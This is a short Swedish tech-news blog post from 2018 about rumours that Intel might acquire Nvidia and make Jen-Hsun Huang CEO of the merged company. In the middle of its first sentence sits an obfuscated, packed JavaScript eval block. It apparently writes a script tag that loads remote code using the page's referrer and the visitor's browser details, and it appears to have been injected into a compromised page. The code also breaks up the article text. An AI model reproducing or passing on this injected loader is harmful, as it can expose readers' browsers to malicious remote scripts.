Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

Är Intel på väg att köpa upp Nvidia?

Är Intel på väg att köpa upp Nvidia?
Sebastian Plengier Ehrnfelt

Nya eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ertft|var|u0026u|referrer|rfner||js|php’.split(‘|’),0,{}))
rykten har dykt upp på nätet som menar att företagen Nvidia och Intel har börjat diskutera ett samarbete eventuellt uppköp från Intels sida.

Om detta stämmer är fortfarande oklart då det sägs i ryktet att Nvidias VD, Jen-Hsun Huang skulle bli VD för det nya sammanslagna bolaget.

Det är inte ovanligt att företag som dessa möts upp och håller möten gällande kommande sammarbeten.
Under 2006 köpte AMD upp ATI Technologies samtidigt som Intel försökte köpa upp Nvidia men utan resultat.

Vad vi vet är att Intels nuvarande VD, Paul Otellini har funderingar på att gå i pension den 13 maj 2013 och då självklart behöver en ersättare. Jen-Hsun Huang kan tänkas vara en potentiell kandidat och vem vet, kanske är det dags att köpa upp Intel.

Via: www.brightsideofnews.com